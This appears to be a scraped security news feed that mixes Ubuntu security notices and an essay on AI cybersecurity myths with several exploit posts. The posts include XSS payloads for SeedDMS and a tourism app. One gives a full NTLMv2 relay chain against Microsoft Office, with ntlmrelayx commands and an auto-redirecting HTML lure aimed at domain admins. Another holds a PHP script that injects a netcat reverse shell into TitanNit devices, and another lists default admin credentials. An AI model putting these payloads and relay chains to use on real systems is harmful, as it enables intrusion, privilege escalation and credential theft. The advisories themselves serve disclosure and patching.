SeedDMS version 6.0.28 suffers from a persistent cross site scripting vulnerability.

    [CVE-ID]:CVE-2024-46409---------------------------------------------------------------------[Suggested description]A stored cross-site scripting (XSS) vulnerability in SeedDMS v6.0.28 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name parameter in the Calendar page.---------------------------------------------------------------------[Additional Information]:To reproduce it, follow this steps:  1) log into SeedMS  2) create a new event named <svg onload=alert()>  3) go to https://demo6.seeddms.org/out/out.LogManagement.php?logname=<date>.log---------------------------------------------------------------------[Vulnerability Type]:Cross Site Scripting (XSS)---------------------------------------------------------------------[Vendor of Product]:SeedDMS-------------------------------------------------------------------[Affected Product Code Base]:SeedDMS - 6.0.28-------------------------------------------------------------------[Affected Component]:The affected param is the Event name param in the post request-------------------------------------------------------------------[Attack Type]:Remote---------------------------------------------------------------------[Impact Information Disclosure]:true--------------------------------------------------------------------[CVE Impact Other]: Run Arbitrary Javascript code--------------------------------------------------------------------[Attack Vectors]:A Crafted name for any event in the calendar--------------------------------------------------------------------[Has vendor confirmed or acknowledged the vulnerability?]:true--------------------------------------------------------------------[Discoverer]:Marco Nappi---------------------------------------------------------------------[Reference]:http://seeddms.com

SeedDMS 6.0.28 Cross Site Scripting

Ubuntu Security Notice 7047-1 - Vladimír Čunát discovered that Knot Resolver incorrectly handled input during DNSSEC validation. A remote attacker could possibly use this issue to bypass certain validations. Vladimír Čunát discovered that Knot Resolver incorrectly handled input during DNSSEC validation. A remote attacker could possibly use this issue to downgrade DNSSEC-secure domains to a DNSSEC-insecure state, resulting in a domain hijacking attack.

    ==========================================================================Ubuntu Security Notice USN-7047-1October 01, 2024knot-resolver vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in knot-resolver.Software Description:- knot-resolver: caching, DNSSEC-validating DNS resolverDetails:Vladimír Čunát discovered that Knot Resolver incorrectly handled inputduring DNSSEC validation. A remote attacker could possibly use this issueto bypass certain validations. (CVE-2019-10190)Vladimír Čunát discovered that Knot Resolver incorrectly handled inputduring DNSSEC validation. A remote attacker could possibly use this issueto downgrade DNSSEC-secure domains to a DNSSEC-insecure state, resultingin a domain hijacking attack. (CVE-2019-10191)Vladimír Čunát discovered that Knot Resolver incorrectly handled certainDNS replies with many resource records. An attacker could possibly usethis issue to consume system resources, resulting in a denial of service.(CVE-2019-19331)Lior Shafir, Yehuda Afek, and Anat Bremler-Barr discovered that KnotResolver incorrectly handled certain queries. A remote attacker coulduse this issue to perform an amplification attack directed at a target.(CVE-2020-12667)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  knot-resolver                   3.2.1-3ubuntu2.2In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7047-1  CVE-2019-10190, CVE-2019-10191, CVE-2019-19331, CVE-2020-12667Package Information:  https://launchpad.net/ubuntu/+source/knot-resolver/3.2.1-3ubuntu2.2

Ubuntu Security Notice USN-7047-1

Ubuntu Security Notice 7050-1 - Benoit Côté-Jodoin and Michael Nipper discovered that Devise-Two-Factor incorrectly handled one-time password validation. An attacker could possibly use this issue to intercept and re-use a one-time password. Garrett Rappaport discovered that Devise-Two-Factor incorrectly handled generating multi-factor authentication codes. An attacker could possibly use this issue to generate valid multi-factor authentication codes.

==========================================================================  
Ubuntu Security Notice USN-7050-1  
October 01, 2024

ruby-devise-two-factor vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Devise-Two-Factor.

Software Description:  
- ruby-devise-two-factor: Barebones two-factor authentication with Devise

Details:

Benoit Côté-Jodoin and Michael Nipper discovered that Devise-Two-Factor  
incorrectly handled one-time password validation. An attacker could  
possibly use this issue to intercept and re-use a one-time password.  
(CVE-2021-43177)

Garrett Rappaport discovered that Devise-Two-Factor incorrectly handled  
generating multi-factor authentication codes. An attacker could possibly  
use this issue to generate valid multi-factor authentication codes.  
(CVE-2024-8796)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  ruby-devise-two-factor          4.0.0-2ubuntu0.1~esm1  
                                  Available with Ubuntu Pro

Ubuntu 20.04 LTS  
  ruby-devise-two-factor          3.1.0-2ubuntu0.1~esm1  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-7050-1   
<https://ubuntu.com/security/notices/USN-7050-1>  
  CVE-2021-43177, CVE-2024-8796

Ubuntu Security Notice USN-7050-1

Microsoft Office 2019 MSO build 1808 (16.0.10411.20011) and Microsoft 365 MSO version 2403 build 16.0.17425.20176 suffer from an NTLMv2 hash disclosure vulnerability.

# Exploit Title: Microsoft Office NTLMv2 Disclosure Vulnerability  
# Exploit Author: Metin Yunus Kandemir  
# Vendor Homepage: https://www.office.com/  
# Software Link: https://www.office.com/  
# Details: https://github.com/passtheticket/CVE-2024-38200  
# Version: Microsoft Office 2019 MSO Build 1808 (16.0.10411.20011), Microsoft 365 MSO (Version 2403 Build 16.0.17425.20176)  
# Tested against: Windows 11  
# CVE: CVE-2024-38200

# Description  
MS Office URI schemes allow for fetching a document from remote source.   
MS URI scheme format is '< scheme-name >:< command-name >"|"< command-argument-descriptor > "|"< command-argument >' .  
Example: ms-word:ofe|u|http://hostname:port/leak.docx  
When the URI "ms-word:ofe|u|http://hostname:port/leak.docx" is invoked from a victim computer. This behaviour is abused to capture and relay NTLMv2 hash over SMB and HTTP. For detailed information about capturing a victim user's NTLMv2 hash over SMB, you can also visit https://www.privsec.nz/releases/ms-office-uri-handlers.

# Proof Of Concept  
 If we add a DNS A record and use this record within the Office URI, Windows will consider the hostname as part of the Intranet Zone. In this way, NTLMv2 authentication occurs automatically and a standard user can escalate privileges without needing a misconfigured GPO. Any domain user with standard privileges can add a non-existent DNS record so this attack works with default settings for a domain user.

1. Add a DNS record to resolve hostname to attacker IP address which runs ntlmrelayx. It takes approximately 5 minutes for the created record to start resolving.  
$ python dnstool.py -u 'unsafe.local\testuser' -p 'pass' -r 'attackerhost' --action 'add' --data [attacker-host-IP] [DC-IP] --zone unsafe.local

2. Fire up ntlmrelayx with following command  
$ python ntlmrelayx.py -t ldap://DC-IP-ADDRESS --escalate-user testuser --http-port 8080

3. Serve following HTML file using Apache server. Replace hostname with added record (e.g. attackerhost).

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Microsoft Office</title>  
</head>  
<body>  
    <a id="link" href="ms-word:ofe|u|http://hostname:port/leak.docx"></a>

    <script>  
        function navigateToLink() {  
            var link = document.getElementById('link');  
            if (link) {  
                var url = link.getAttribute('href');  
                window.location.href = url;  
            }  
        }  
        window.onload = navigateToLink;  
    </script>  
</body>  
</html> 

4. Send the URL of the above HTML file to a user with domain admin privileges. You should check whether the DNS record is resolved with the ping command before sending the URL. When the victim user navigates to the URL, clicking the 'Open' button is enough to capture the NTLMv2 hash. (no warning!)

5. The captured NTLMv2 hash over HTTP is relayed to Domain Controller with ntlmrelayx. As a result, a standard user can obtain DCSync and Enterprise Admins permissions under the default configurations with just two clicks.

Microsoft Office NTLMv2 Disclosure

Organizations looking to maximize their security posture will find AI a valuable complement to existing people, systems, and processes.

Source: marcos alvarado via Alamy Stock Photo

COMMENTARY

The global rise of increasingly sophisticated cybercrimes creates daily challenges for the cybersecurity industry, as security professionals grapple with new and evolving attacks, complex IT architecture, and the integration of artificial intelligence (AI) into nefarious actors' tactics, techniques, and procedures (TTPs). As a result, cybersecurity practitioners feel a sense of urgency to stay at the forefront of technological advances to defend against a growing arsenal of exploits.

In this environment, a methodical approach to the intentional use of AI for cybersecurity protocols will help avoid falling prey to the hype and myths of groupthink, such as these five myths of AI and cybersecurity: 

**1\. You'll fall behind if AI isn't your primary solution for cybersecurity.**

While AI can enhance cybersecurity tasks by analyzing large volumes of data to recognize nefarious identifying patterns, it can also be susceptible to false positives and negatives, be trained on bad data, or act in unexpected ways. Many common cyber threats can still be effectively mitigated through basic security practices like strong passwords, regular patching, and employee awareness about social engineering. Incorporating AI into security solutions is not a license to abandon proven tools and replace established best practices. Sophisticated attackers will find ways to evade AI-based detection, so adopting AI cannot be the only solution for security and defense. Time-tested security practices like organizational culture, leadership commitment, and employee training are still critical fundamentals of a robust organizational risk management practice. 

**2\. Threat actors are using AI, which will lead to an exponential increase in cyberattacks.**

AI is undoubtedly a powerful tool that can be used for both good and bad — it's not a guaranteed game-changer for threat actors. The cybersecurity landscape is a dynamic battleground, and the interplay between AI-powered attacks and defenses is complex. AI may increase the speed and sophistication of certain attacks, such as better phishing attempts; however, it has not fundamentally changed the attack vectors or the attack surface within organizations. A mature security posture using foundational defensive practices continues to be a sound approach to reducing risk and thwarting attacks. 

**3\. AI-powered tools are better, and every tool needs an AI feature.**

AI-aided tools can provide powerful additions to a defensive infrastructure with quicker, more comprehensive data discovery. Left unchecked, AI is capable of producing sometimes comical but altogether bad results, such as the Google Overview suggestion of adding glue to homemade pizza sauce, or the McDonald's AI drive-through putting bacon on ice cream. In cybersecurity, erroneous results have serious consequences, including loss of trust, excessive costs, and endangering human safety. The potential benefit of any AI-powered resource must be balanced against the potential cost of error. The safest use of AI is within a layered defense model, which allows for verification and redundancy in protective solutions. 

**4\. You can only combat AI with AI.**

AI is a valuable tool in the cybersecurity quiver, but it's not impenetrable. Like any other defensive technique, attackers can exploit vulnerabilities in AI models or develop exploits to bypass AI defenses. Combating AI threats requires a multilayered approach that combines AI with human expertise, traditional security measures, and a strong focus on prevention, detection, and response. Using AI to combat AI may also raise ethical and legal concerns, particularly around issues like autonomous decision-making, accountability, and potential for misuse. These concerns must be carefully considered before implementation, to ensure responsible, ethical use of AI in cybersecurity. By leveraging the strengths of both humans and AI, organizations can build a more resilient and effective cybersecurity posture. 

**5\. AI is going to replace your job.**

Companies who are hiring fewer entry-level people for cybersecurity roles are not doing so because AI has eliminated those jobs; rather, they are limited by shrinking budgets and a need to hire people who can make an immediate impact when they come onboard. AI excels at automating repetitive tasks, analyzing vast amounts of data and identifying patterns, but human intuition and judgment is still needed to interpret those insights, make critical decisions, and adapt strategies to combat evolving threats. At its best, AI allows humans to focus on creative and strategic thinking to deliver complex problem-solving. The prominence of AI has created new jobs like AI engineers and AI ethicists to manage AI systems. AI-related roles, along with roles in cybersecurity, will continue to emerge and evolve. AI won't replace people, but people who know how to work with AI may replace people who don't. 

Effective cybersecurity requires a multilayered approach that combines technology, processes, and people. Solely relying on AI for cybersecurity can create a false sense of security, and AI-based cybersecurity solutions can be costly and complex. While AI is transforming the workforce, it's unlikely to lead to widespread job displacement. Instead, it likely will change the nature of work and require adaptation and development of new skills.

Progressive companies will see the value of investing in training programs and implementing policies that support workforce transition. Organizations looking to maximize their security posture with enhanced value, productivity, creativity, and innovation will find AI a valuable complement to existing people, systems, and processes.  

**About the Authors**

Senior Vice President & Executive Dean, Western Governors University

Paul Bingham is the senior vice president and executive dean at Western Governors University’s School of Technology, which currently serves 60,000 students nationwide and is the top conferrer of cybersecurity degrees in the country. Prior to WGU, Paul spent 24 years as an FBI agent, leading and managing domestic and international cybersecurity investigations and FBI SWAT teams on over 100 high-risk tactical missions. 

SIEM & Data Analytics Engineer, H2L Solutions Inc.

Micah VanFossen is a cybersecurity engineer currently working as a SIEM & Data Analytics Engineer at H2L Solutions Inc., where he focuses on data ETL (enrich, transform, load) processes, detections, and data analysis. He is a lifelong learner, spending time researching, studying, and educating others through his blog, The Purple Van. Micah is also a member of the SIII Tiger Team for the US Cyber Games Program and holds an MS in cybersecurity and information assurance from WGU.

Top 5 Myths of AI &amp; Cybersecurity

Ubuntu Security Notice 7043-2 - USN-7043-1 fixed a vulnerability in cups-filters. This update provides the corresponding update for Ubuntu 18.04 LTS. Simone Margaritelli discovered that the cups-filters cups-browsed component could be used to create arbitrary printers from outside the local network. In combination with issues in other printing components, a remote attacker could possibly use this issue to connect to a system, created manipulated PPD files, and execute arbitrary code when a printer is used. This update disables support for the legacy CUPS printer discovery protocol.

    ==========================================================================Ubuntu Security Notice USN-7043-2October 01, 2024cups-filters vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:cups-filters could be made to run programs if it received specially craftednetwork traffic.Software Description:- cups-filters: OpenPrinting CUPS FiltersDetails:USN-7043-1 fixed a vulnerability in cups-filters. This update providesthe corresponding update for Ubuntu 18.04 LTS.Original advisory details: Simone Margaritelli discovered that the cups-filters cups-browsed component could be used to create arbitrary printers from outside the local network. In combination with issues in other printing components, a remote attacker could possibly use this issue to connect to a system, created manipulated PPD files, and execute arbitrary code when a printer is used. This update disables support for the legacy CUPS printer discovery protocol.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  cups-browsed                    1.20.2-0ubuntu3.3+esm1                                  Available with Ubuntu Pro  cups-filters                    1.20.2-0ubuntu3.3+esm1                                  Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7043-2  https://ubuntu.com/security/notices/USN-7043-1  CVE-2024-47176

Ubuntu Security Notice USN-7043-2

Ubuntu Security Notice 7049-1 - It was discovered that PHP incorrectly handled parsing multipart form data. A remote attacker could possibly use this issue to inject payloads and cause PHP to ignore legitimate data. It was discovered that PHP incorrectly handled the cgi.force_redirect configuration option due to environment variable collisions. In certain configurations, an attacker could possibly use this issue bypass force_redirect restrictions.

==========================================================================  
Ubuntu Security Notice USN-7049-1  
October 01, 2024

php7.4, php8.1, php8.3 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in PHP.

Software Description:  
- php8.3: HTML-embedded scripting language interpreter  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled parsing multipart form data.  
A remote attacker could possibly use this issue to inject payloads and  
cause PHP to ignore legitimate data. (CVE-2024-8925)

It was discovered that PHP incorrectly handled the cgi.force_redirect  
configuration option due to environment variable collisions. In certain  
configurations, an attacker could possibly use this issue bypass  
force_redirect restrictions. (CVE-2024-8927)

It was discovered that PHP-FPM incorrectly handled logging. A remote  
attacker could possibly use this issue to alter and inject arbitrary  
contents into log files. This issue only affected Ubuntu 22.04 LTS, and  
Ubuntu 24.04 LTS. (CVE-2024-9026)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  libapache2-mod-php8.3           8.3.6-0ubuntu0.24.04.2  
  php8.3-cgi                      8.3.6-0ubuntu0.24.04.2  
  php8.3-cli                      8.3.6-0ubuntu0.24.04.2  
  php8.3-fpm                      8.3.6-0ubuntu0.24.04.2

Ubuntu 22.04 LTS  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.19  
  php8.1-cgi                      8.1.2-1ubuntu2.19  
  php8.1-cli                      8.1.2-1ubuntu2.19  
  php8.1-fpm                      8.1.2-1ubuntu2.19

Ubuntu 20.04 LTS  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.24  
  php7.4-cgi                      7.4.3-4ubuntu2.24  
  php7.4-cli                      7.4.3-4ubuntu2.24  
  php7.4-fpm                      7.4.3-4ubuntu2.24

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7049-1  
  CVE-2024-8925, CVE-2024-8927, CVE-2024-9026

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.3/8.3.6-0ubuntu0.24.04.2  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.19  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.24

Ubuntu Security Notice USN-7049-1

Tourism Management System version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Tourism Management System 1.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /rate_review.php?id=1"><script>alert(/indoushka/)</script>[+] http://localhost/tourism/rate_review.php?id=1%22%3E%3Cscript%3Ealert(/indoushka/)%3C/script%3EGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tourism Management System 1.0 Cross Site Scripting

TitanNit Web Control 2.01 and Atemio 7600 suffer from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : TitanNit Web Control 2.01 / Atemio 7600 php code injection Vulnerability                                                    |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sat-world.com/Atemio-AM-520-HD-TitanNit-Edition                                                                 |  
=============================================================================================================================================

poc :

[+] Explanation: 

    We used the exec function to run the nc(netcat) command which subscribes to the subscriptions offered by the privileged execution.

    In Windows environments, you can use the netcat tool for communications headsets.

    Note: Make sure that netcat is installed on your system (you can download netcat for Windows). 

   [+] save as poc.php

[+] Usage : C:\www\test>php 3.php poc.php

[+] payload : 

<?php

class RemoteControl {

    private $timeout = 10;  
    private $target;  
    private $callback;  
    private $path = "/query?getcommand=&cmd=";  
    private $lport;  
    private $cmd;

    public function beacon() {  
        $this->cmd = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc ";  
        $this->cmd .= $this->callback . " ";  
        $this->cmd .= $this->lport . " ";  
        $this->cmd .= ">/tmp/j";  
        $this->path .= $this->cmd;

        $ch = curl_init($this->target . $this->path);  
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
        curl_exec($ch);  
        curl_close($ch);  
    }

    public function slusaj() {  
        echo "[*] Listening on port " . $this->lport . "\n";  
        sleep(1);

        // Windows solution using exec  
        $cmd = "nc -lvp " . $this->lport; // Example with netcat listener  
        exec($cmd, $output, $result_code);

                if ($result_code == 0) {  
            echo "[*] Rootshell session opened\n";  
            foreach ($output as $line) {  
                echo $line . "\n";  
            }  
        } else {  
            echo "[!] Error in executing the listener\n";  
        }  
    }

    public function tajmer() {  
        for ($z = $this->timeout; $z > 0; $z--) {  
            echo "[*] Callback waiting: " . $z . "s\r";  
            sleep(1);  
        }  
    }

    public function thricer() {  
        echo "[*] Starting callback listener\n";

        // Run listener in the background using exec  
        $this->slusaj();

        echo "[*] Generating callback payload\n";  
        sleep(1);  
        echo "[*] Calling\n";  
        $this->beacon();  
    }

    public function howto($argv) {  
        if (count($argv) != 4) {  
            $this->usage();  
        } else {  
            $this->target = $argv[1];  
            $this->callback = $argv[2];  
            $this->lport = (int)$argv[3];

            if (strpos($this->target, "http") === false) {  
                $this->target = "http://" . $this->target;  
            }  
        }  
    }

    public function dostabesemolk() {

    }

    public function usage() {  
        $this->dostabesemolk();  
        echo "Usage: php titan.php <target ip> <listen ip> <listen port>\n";  
        echo "Example: php titan.php 192.168.1.13:20000 192.168.1.8 9999\n";  
        exit(0);  
    }

    public function main($argv) {  
        $this->howto($argv);  
        $this->thricer();  
    }  
}

$control = new RemoteControl();  
$control->main($argv);  
?>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

TitanNit Web Control 2.01 / Atemio 7600 Code Injection

Teacher Subject Allocation Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Teacher Subject Allocation Management System 1.0 Insecure Settings Vulnerability                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/tsas/admin/login.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Latest News